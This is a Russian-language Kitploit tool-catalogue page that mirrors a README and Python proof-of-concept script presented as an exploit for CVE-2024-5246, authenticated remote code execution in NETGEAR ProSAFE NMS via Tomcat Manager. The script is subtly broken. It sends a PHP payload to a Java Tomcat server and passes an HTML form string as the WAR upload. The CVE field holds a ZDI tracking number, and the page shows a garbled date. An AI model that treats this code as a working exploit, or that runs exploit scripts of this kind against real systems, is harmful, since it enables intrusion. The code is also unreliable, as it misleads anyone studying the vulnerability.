Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-5246 — Proof-of-concept Python-скрипт, демонстрирующий аутентифицированное удалённое выполнение кода в NETGEAR ProSAFE Network Management System через уязвимый Apache Tomcat путём развёртывания вредоносного веб-приложения. | Kitploit
Инструменты/GitHubGitHub/abdurahmon3236/cve-2024-5246
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

Proof-of-concept Python-скрипт, демонстрирующий аутентифицированное удалённое выполнение кода в NETGEAR ProSAFE Network Management System через уязвимый Apache Tomcat путём развёртывания вредоносного веб-приложения.

Репозиторий
222 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Вот структурированный README.md для Proof of Concept (PoC) уязвимости удаленного выполнения кода (RCE) в NETGEAR ProSAFE Network Management System:


Доказательство концепции (PoC) для удаленного выполнения кода в NETGEAR ProSAFE Network Management System

Этот репозиторий содержит скрипт Proof of Concept (PoC), демонстрирующий уязвимость удаленного выполнения кода (RCE) в NETGEAR ProSAFE Network Management System. Уязвимость связана с использованием уязвимой версии Apache Tomcat в составе установщика продукта. Данная проблема позволяет аутентифицированным злоумышленникам выполнять произвольный код на затронутых установках.

Описание уязвимости

CVE-ID: ZDI-CAN-22868

Обзор: NETGEAR ProSAFE Network Management System содержит уязвимость удаленного выполнения кода из-за использования уязвимой версии Apache Tomcat. Атакующий, имеющий аутентификацию, может использовать эту уязвимость для выполнения произвольного кода на затронутой системе в контексте SYSTEM.

Затронутые версии:

  • Версии NETGEAR ProSAFE Network Management System с уязвимыми версиями Apache Tomcat.

Аутентификация: Требуется

Детали PoC

Данный PoC демонстрирует, как злоумышленник может использовать уязвимость для достижения удаленного выполнения кода. Конкретная ошибка заключается в установщике продукта из-за использования устаревшей или уязвимой версии Apache Tomcat.

Скрипт PoC

Следующий скрипт иллюстрирует, как использовать эту уязвимость RCE. Убедитесь, что у вас есть соответствующие разрешения перед запуском этого PoC.

Важно: Этот PoC предназначен только для образовательных целей и не должен использоваться для несанкционированных или вредоносных действий.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

Пояснение

  1. Конфигурация: Установите target_url на URL Tomcat Manager целевой системы, и обновите username и password действительными учетными данными.
  2. Полезная нагрузка: Полезная нагрузка — это простой PHP-скрипт, выполняющий системную команду для демонстрации выполнения кода.
  3. Функция эксплуатации: Функция exploit_rce() отправляет POST-запрос для развертывания вредоносного веб-приложения.
  4. Развертывание: Скрипт пытается развернуть новое веб-приложение с вредоносной полезной нагрузкой и выводит результат.

Важные соображения

  • Разрешения: Убедитесь, что у вас есть явное разрешение на тестирование этой уязвимости на целевой системе. Несанкционированное тестирование незаконно и неэтично.
  • Тестовая среда: Проводите тесты в контролируемой среде, чтобы избежать влияния на производственные системы.
  • Этичное использование: Используйте этот PoC ответственно и только в авторизованных контекстах.

Меры по снижению риска

Для устранения этой уязвимости выполните следующие шаги:

  1. Обновите Tomcat: Перейдите на версию Apache Tomcat, в которой исправлена уязвимость.
  2. Защитите доступ: Убедитесь, что Tomcat Manager и другие чувствительные интерфейсы защищены и доступны только авторизованным пользователям.
  3. Проверьте конфигурации: Регулярно проверяйте и ужесточайте конфигурацию веб-приложений и серверов.

Выполнив эти шаги, вы сможете устранить уязвимость RCE в NETGEAR ProSAFE Network Management System и повысить общую безопасность.


Этот README.md предоставляет подробное описание и скрипт PoC для уязвимости RCE, включая инструкции по настройке, соображения и рекомендации по устранению.

Скачать инструмент